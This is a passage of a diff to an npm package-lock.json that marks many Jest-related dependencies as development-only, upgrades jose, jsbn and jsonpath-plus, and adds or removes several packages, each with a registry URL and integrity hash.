"sha512-2SPlun1JUPWoM6t3F0dw0FkCF/jWY8kttcY4f599GLTSjh2OCuuhdTkJQsEcZzBqbXZGKMK2OqW1oZsjtf/gQA==", + "dev": true, "dependencies": { "pkg-dir": "^4.2.0", "resolve-cwd": "^3.0.0" @@ -2014,6 +2246,7 @@ "version": "0.1.4", "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", + "dev": true, "engines": { "node": ">=0.8.19" } @@ -2022,6 +2255,7 @@ "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", + "dev": true, "dependencies": { "once": "^1.3.0", "wrappy": "1" @@ -2030,17 +2264,41 @@ "node_modules/inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" + "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", + "dev": true + }, + "node_modules/ip-address": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-9.0.5.tgz", + "integrity": "sha512-zHtQzGojZXTwZTHQqra+ETKd4Sn3vgi7uBmlPoXVWZqYvuKmtI0l/VZTjqGmJY9x88GGOaZ9+G9ES8hC4T4X8g==", + "dev": true, + "license": "MIT", + "dependencies": { + "jsbn": "1.1.0", + "sprintf-js": "^1.1.3" + }, + "engines": { + "node": ">= 12" + } + }, + "node_modules/ip-address/node_modules/sprintf-js": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.3.tgz", + "integrity": "sha512-Oo+0REFV59/rz3gfJNKQiBlwfHaSESl1pcGyABQsnnIfWOFt6JNj5gCog2U6MLZ//IGYD+nA8nI+mTShREReaA==", + "dev": true, + "license": "BSD-3-Clause" }, "node_modules/is-arrayish": { "version": "0.2.1", "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==" + "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", + "dev": true }, "node_modules/is-core-module": { "version": "2.15.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.15.1.tgz", "integrity": "sha512-z0vtXSwucUJtANQWldhbtbt7BnL0vxiFjIdDLAatwhDYty2bad6s+rijD6Ri4YuYJubLzIJLUidCh09e1djEVQ==", + "dev": true, "dependencies": { "hasown": "^2.0.2" }, @@ -2055,6 +2313,7 @@ "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", + "dev": true, "engines": { "node": ">=8" } @@ -2063,6 +2322,7 @@ "version": "2.1.0", "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", + "dev": true, "engines": { "node": ">=6" } @@ -2071,6 +2331,7 @@ "version": "7.0.0", "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", + "dev": true, "engines": { "node": ">=0.12.0" } @@ -2079,6 +2340,7 @@ "version": "2.0.1", "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", + "dev": true, "engines": { "node": ">=8" }, @@ -2086,16 +2348,11 @@ "url": "https://github.com/sponsors/sindresorhus" } }, - "node_modules/is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==", - "dev": true - }, "node_modules/isexe": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==" + "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", + "dev": true }, "node_modules/isomorphic-ws": { "version": "5.0.0", @@ -2106,16 +2363,11 @@ "ws": "*" } }, - "node_modules/isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==", - "dev": true - }, "node_modules/istanbul-lib-coverage": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", + "dev": true, "engines": { "node": ">=8" } @@ -2124,6 +2376,7 @@ "version": "5.2.1", "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", + "dev": true, "dependencies": { "@babel/core": "^7.12.3", "@babel/parser": "^7.14.7", @@ -2139,6 +2392,7 @@ "version": "3.0.1", "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.1.tgz", "integrity": "sha512-GCfE1mtsHGOELCU8e/Z7YWzpmybrx/+dSTfLrvY8qRmaY6zXTKWn6WQIjaAFw069icm6GVMNkgu0NzI4iPZUNw==", + "dev": true, "dependencies": { "istanbul-lib-coverage": "^3.0.0", "make-dir": "^4.0.0", @@ -2152,6 +2406,7 @@ "version": "4.0.1", "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", + "dev": true, "dependencies": { "debug": "^4.1.1", "istanbul-lib-coverage": "^3.0.0", @@ -2165,6 +2420,7 @@ "version": "3.1.7", "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.7.tgz", "integrity": "sha512-BewmUXImeuRk2YY0PVbxgKAysvhRPUQE0h5QRM++nVWyubKGV0l8qQ5op8+B2DOmwSe63Jivj0BjkPQVf8fP5g==", + "dev": true, "dependencies": { "html-escaper": "^2.0.0", "istanbul-lib-report": "^3.0.0" @@ -2177,6 +2433,7 @@ "version": "10.9.2", "resolved": "https://registry.npmjs.org/jake/-/jake-10.9.2.tgz", "integrity": "sha512-2P4SQ0HrLQ+fw6llpLnOaGAvN2Zu6778SJMrCUwns4fOoG9ayrTiZk3VV8sCPkVZF8ab0zksVpS8FDY5pRCNBA==", + "dev": true, "dependencies": { "async": "^3.2.3", "chalk": "^4.0.2", @@ -2194,6 +2451,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest/-/jest-29.7.0.tgz", "integrity": "sha512-NIy3oAFp9shda19hy4HK0HRTWKtPJmGdnvywu01nOqNC2vZg+Z+fvJDxpMQA88eb2I9EcafcdjYgsDthnYTvGw==", + "dev": true, "dependencies": { "@jest/core": "^29.7.0", "@jest/types": "^29.6.3", @@ -2219,6 +2477,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.7.0.tgz", "integrity": "sha512-fEArFiwf1BpQ+4bXSprcDc3/x4HSzL4al2tozwVpDFpsxALjLYdyiIK4e5Vz66GQJIbXJ82+35PtysofptNX2w==", + "dev": true, "dependencies": { "execa": "^5.0.0", "jest-util": "^29.7.0", @@ -2232,6 +2491,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.7.0.tgz", "integrity": "sha512-3E1nCMgipcTkCocFwM90XXQab9bS+GMsjdpmPrlelaxwD93Ad8iVEjX/vvHPdLPnFf+L40u+5+iutRdA1N9myw==", + "dev": true, "dependencies": { "@jest/environment": "^29.7.0", "@jest/expect": "^29.7.0", @@ -2262,6 +2522,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.7.0.tgz", "integrity": "sha512-OVVobw2IubN/GSYsxETi+gOe7Ka59EFMR/twOU3Jb2GnKKeMGJB5SGUUrEz3SFVmJASUdZUzy83sLNNQ2gZslg==", + "dev": true, "dependencies": { "@jest/core": "^29.7.0", "@jest/test-result": "^29.7.0", @@ -2294,6 +2555,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.7.0.tgz", "integrity": "sha512-uXbpfeQ7R6TZBqI3/TxCU4q4ttk3u0PJeC+E0zbfSoSjq6bJ7buBPxzQPL0ifrkY4DNu4JUdk0ImlBUYi840eQ==", + "dev": true, "dependencies": { "@babel/core": "^7.11.6", "@jest/test-sequencer": "^29.7.0", @@ -2338,6 +2600,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.7.0.tgz", "integrity": "sha512-LMIgiIrhigmPrs03JHpxUh2yISK3vLFPkAodPeo0+BuF7wA2FoQbkEg1u8gBYBThncu7e1oEDUfIXVuTqLRUjw==", + "dev": true, "dependencies": { "chalk": "^4.0.0", "diff-sequences": "^29.6.3", @@ -2352,6 +2615,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.7.0.tgz", "integrity": "sha512-q617Auw3A612guyaFgsbFeYpNP5t2aoUNLwBUbc/0kD1R4t9ixDbyFTHd1nok4epoVFpr7PmeWHrhvuV3XaJ4g==", + "dev": true, "dependencies": { "detect-newline": "^3.0.0" }, @@ -2363,6 +2627,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.7.0.tgz", "integrity": "sha512-gns+Er14+ZrEoC5fhOfYCY1LOHHr0TI+rQUHZS8Ttw2l7gl+80eHc/gFf2Ktkw0+SIACDTeWvpFcv3B04VembQ==", + "dev": true, "dependencies": { "@jest/types": "^29.6.3", "chalk": "^4.0.0", @@ -2378,6 +2643,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.7.0.tgz", "integrity": "sha512-DOSwCRqXirTOyheM+4d5YZOrWcdu0LNZ87ewUoywbcb2XR4wKgqiG8vNeYwhjFMbEkfju7wx2GYH0P2gevGvFw==", + "dev": true, "dependencies": { "@jest/environment": "^29.7.0", "@jest/fake-timers": "^29.7.0", @@ -2394,6 +2660,7 @@ "version": "29.6.3", "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.6.3.tgz", "integrity": "sha512-zrteXnqYxfQh7l5FHyL38jL39di8H8rHoecLH3JNxH3BwOrBsNeabdap5e0I23lD4HHI8W5VFBZqG4Eaq5LNcw==", + "dev": true, "engines": { "node": "^14.15.0 || ^16.10.0 || >=18.0.0" } @@ -2402,6 +2669,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.7.0.tgz", "integrity": "sha512-fP8u2pyfqx0K1rGn1R9pyE0/KTn+G7PxktWidOBTqFPLYX0b9ksaMFkhK5vrS3DVun09pckLdlx90QthlW7AmA==", + "dev": true, "dependencies": { "@jest/types": "^29.6.3", "@types/graceful-fs": "^4.1.3", @@ -2426,6 +2694,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.7.0.tgz", "integrity": "sha512-kYA8IJcSYtST2BY9I+SMC32nDpBT3J2NvWJx8+JCuCdl/CR1I4EKUJROiP8XtCcxqgTTBGJNdbB1A8XRKbTetw==", + "dev": true, "dependencies": { "jest-get-type": "^29.6.3", "pretty-format": "^29.7.0" @@ -2438,6 +2707,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.7.0.tgz", "integrity": "sha512-sBkD+Xi9DtcChsI3L3u0+N0opgPYnCRPtGcQYrgXmR+hmt/fYfWAL0xRXYU8eWOdfuLgBe0YCW3AFtnRLagq/g==", + "dev": true, "dependencies": { "chalk": "^4.0.0", "jest-diff": "^29.7.0", @@ -2452,6 +2722,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.7.0.tgz", "integrity": "sha512-GBEV4GRADeP+qtB2+6u61stea8mGcOT4mCtrYISZwfu9/ISHFJ/5zOMXYbpBE9RsS5+Gb63DW4FgmnKJ79Kf6w==", + "dev": true, "dependencies": { "@babel/code-frame": "^7.12.13", "@jest/types": "^29.6.3", @@ -2471,6 +2742,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.7.0.tgz", "integrity": "sha512-ITOMZn+UkYS4ZFh83xYAOzWStloNzJFO2s8DWrE4lhtGD+AorgnbkiKERe4wQVBydIGPx059g6riW5Btp6Llnw==", + "dev": true, "dependencies": { "@jest/types": "^29.6.3", "@types/node": "*", @@ -2484,6 +2756,7 @@ "version": "1.2.3", "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", + "dev": true, "engines": { "node": ">=6" }, @@ -2500,6 +2773,7 @@ "version": "29.6.3", "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.6.3.tgz", "integrity": "sha512-KJJBsRCyyLNWCNBOvZyRDnAIfUiRJ8v+hOBQYGn8gDyF3UegwiP4gwRR3/SDa42g1YbVycTidUF3rKjyLFDWbg==", + "dev": true, "engines": { "node": "^14.15.0 || ^16.10.0 || >=18.0.0" } @@ -2508,6 +2782,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.7.0.tgz", "integrity": "sha512-IOVhZSrg+UvVAshDSDtHyFCCBUl/Q3AAJv8iZ6ZjnZ74xzvwuzLXid9IIIPgTnY62SJjfuupMKZsZQRsCvxEgA==", + "dev": true, "dependencies": { "chalk": "^4.0.0", "graceful-fs": "^4.2.9", @@ -2527,6 +2802,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.7.0.tgz", "integrity": "sha512-un0zD/6qxJ+S0et7WxeI3H5XSe9lTBBR7bOHCHXkKR6luG5mwDDlIzVQ0V5cZCuoTgEdcdwzTghYkTWfubi+nA==", + "dev": true, "dependencies": { "jest-regex-util": "^29.6.3", "jest-snapshot": "^29.7.0" @@ -2539,6 +2815,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.7.0.tgz", "integrity": "sha512-fsc4N6cPCAahybGBfTRcq5wFR6fpLznMg47sY5aDpsoejOcVYFb07AHuSnR0liMcPTgBsA3ZJL6kFOjPdoNipQ==", + "dev": true, "dependencies": { "@jest/console": "^29.7.0", "@jest/environment": "^29.7.0", @@ -2570,6 +2847,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.7.0.tgz", "integrity": "sha512-gUnLjgwdGqW7B4LvOIkbKs9WGbn+QLqRQQ9juC6HndeDiezIwhDP+mhMwHWCEcfQ5RUXa6OPnFF8BJh5xegwwQ==", + "dev": true, "dependencies": { "@jest/environment": "^29.7.0", "@jest/fake-timers": "^29.7.0", @@ -2602,6 +2880,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.7.0.tgz", "integrity": "sha512-Rm0BMWtxBcioHr1/OX5YCP8Uov4riHvKPknOGs804Zg9JGZgmIBkbtlxJC/7Z4msKYVbIJtfU+tKb8xlYNfdkw==", + "dev": true, "dependencies": { "@babel/core": "^7.11.6", "@babel/generator": "^7.7.2", @@ -2632,6 +2911,7 @@ "version": "7.6.3", "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true, "bin": { "semver": "bin/semver.js" }, @@ -2643,6 +2923,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.7.0.tgz", "integrity": "sha512-z6EbKajIpqGKU56y5KBUgy1dt1ihhQJgWzUlZHArA/+X2ad7Cb5iF+AK1EWVL/Bo7Rz9uurpqw6SiBCefUbCGA==", + "dev": true, "dependencies": { "@jest/types": "^29.6.3", "@types/node": "*", @@ -2659,6 +2940,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.7.0.tgz", "integrity": "sha512-ZB7wHqaRGVw/9hST/OuFUReG7M8vKeq0/J2egIGLdvjHCmYqGARhzXmtgi+gVeZ5uXFF219aOc3Ls2yLg27tkw==", + "dev": true, "dependencies": { "@jest/types": "^29.6.3", "camelcase": "^6.2.0", @@ -2675,6 +2957,7 @@ "version": "6.3.0", "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", + "dev": true, "engines": { "node": ">=10" }, @@ -2686,6 +2969,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.7.0.tgz", "integrity": "sha512-49Fg7WXkU3Vl2h6LbLtMQ/HyB6rXSIX7SqvBLQmssRBGN9I0PNvPmAmCWSOY6SOvrjhI/F7/bGAv9RtnsPA03g==", + "dev": true, "dependencies": { "@jest/test-result": "^29.7.0", "@jest/types": "^29.6.3", @@ -2704,6 +2988,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.7.0.tgz", "integrity": "sha512-eIz2msL/EzL9UFTFFx7jBTkeZfku0yUAyZZZmJ93H2TYEiroIx2PQjEXcwYtYl8zXCxb+PAmA2hLIt/6ZEkPHw==", + "dev": true, "dependencies": { "@types/node": "*", "jest-util": "^29.7.0", @@ -2718,6 +3003,7 @@ "version": "8.1.1", "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", + "dev": true, "dependencies": { "has-flag": "^4.0.0" }, @@ -2729,11 +3015,11 @@ } }, "node_modules/jose": { - "version": "4.15.5", - "resolved": "https://registry.npmjs.org/jose/-/jose-4.15.5.tgz", - "integrity": "sha512-jc7BFxgKPKi94uOvEmzlSWFFe2+vASyXaKUpdQKatWAESU2MWjDfFf0fdfc83CDKcA5QecabZeNLyfhe3yKNkg==", + "version": "6.0.11", + "resolved": "https://registry.npmjs.org/jose/-/jose-6.0.11.tgz", + "integrity": "sha512-QxG7EaliDARm1O1S8BGakqncGT9s25bKL1WSf6/oa17Tkqwi8D2ZNglqCF+DsYF88/rV66Q/Q2mFAy697E1DUg==", "dev": true, - "optional": true, + "license": "MIT", "funding": { "url": "https://github.com/sponsors/panva" } @@ -2741,7 +3027,8 @@ "node_modules/js-tokens": { "version": "4.0.0", "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==" + "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", + "dev": true }, "node_modules/js-yaml": { "version": "4.1.0", @@ -2756,15 +3043,27 @@ } }, "node_modules/jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==", - "dev": true + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", + "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==", + "dev": true, + "license": "MIT" + }, + "node_modules/jsep": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", + "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 10.16.0" + } }, "node_modules/jsesc": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-3.0.2.tgz", "integrity": "sha512-xKqzzWXDttJuOcawBt4KnKHHIf5oQ/Cxax+0PWFG+DFDgHNAdi+TXECADI+RYiFUMmx8792xsMbbgXj4CwnP4g==", + "dev": true, "bin": { "jsesc": "bin/jsesc" }, @@ -2775,30 +3074,14 @@ "node_modules/json-parse-even-better-errors": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==" - }, - "node_modules/json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==", - "dev": true - }, - "node_modules/json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==", - "dev": true - }, - "node_modules/json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==", + "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", "dev": true }, "node_modules/json5": { "version": "2.2.3", "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", + "dev": true, "bin": { "json5": "lib/cli.js" }, @@ -2807,33 +3090,29 @@ } }, "node_modules/jsonpath-plus": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-7.2.0.tgz", - "integrity": "sha512-zBfiUPM5nD0YZSBT/o/fbCUlCcepMIdP0CJZxM1+KgA4f2T206f6VAg9e7mX35+KlMaIc5qXW34f3BnwJ3w+RA==", - "dev": true, - "engines": { - "node": ">=12.0.0" - } - }, - "node_modules/jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", + "version": "10.3.0", + "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.3.0.tgz", + "integrity": "sha512-8TNmfeTCk2Le33A3vRRwtuworG/L5RrgMvdjhKZxvyShO+mBu2fP50OWUjRLNtvw344DdDarFh9buFAZs5ujeA==", "dev": true, + "license": "MIT", "dependencies": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" + "@jsep-plugin/assignment": "^1.3.0", + "@jsep-plugin/regex": "^1.0.4", + "jsep": "^1.4.0" + }, + "bin": { + "jsonpath": "bin/jsonpath-cli.js", + "jsonpath-plus": "bin/jsonpath-cli.js" }, "engines": { - "node": ">=0.6.0" + "node": ">=18.0.0" } }, "node_modules/kleur": { "version": "3.0.3", "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", + "dev": true, "engines": { "node": ">=6" } @@ -2842,6 +3121,7 @@ "version": "3.1.0", "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", + "dev": true, "engines": { "node": ">=6" } @@ -2849,12 +3129,14 @@ "node_modules/lines-and-columns": { "version": "1.2.4", "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==" + "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", + "dev": true }, "node_modules/locate-path": { "version": "5.0.0", "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", + "dev": true, "dependencies": { "p-locate": "^4.1.0" }, @@ -2865,12 +3147,14 @@ "node_modules/lodash.memoize": { "version": "4.1.2", "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-4.1.2.tgz", - "integrity": "sha512-t7j+NzmgnQzTAYXcsHYLgimltOV1MXHtlOWf6GjL9Kj8GK5FInw5JotxvbOs+IvV1/Dzo04/fCGfLVs7aXb4Ag==" + "integrity": "sha512-t7j+NzmgnQzTAYXcsHYLgimltOV1MXHtlOWf6GjL9Kj8GK5FInw5JotxvbOs+IvV1/Dzo04/fCGfLVs7aXb4Ag==", + "dev": true }, "node_modules/lru-cache": { "version": "5.1.1", "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", + "dev": true, "dependencies": { "yallist": "^3.0.2" } @@ -2879,6 +3163,7 @@ "version": "4.0.0", "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-4.0.0.tgz", "integrity": 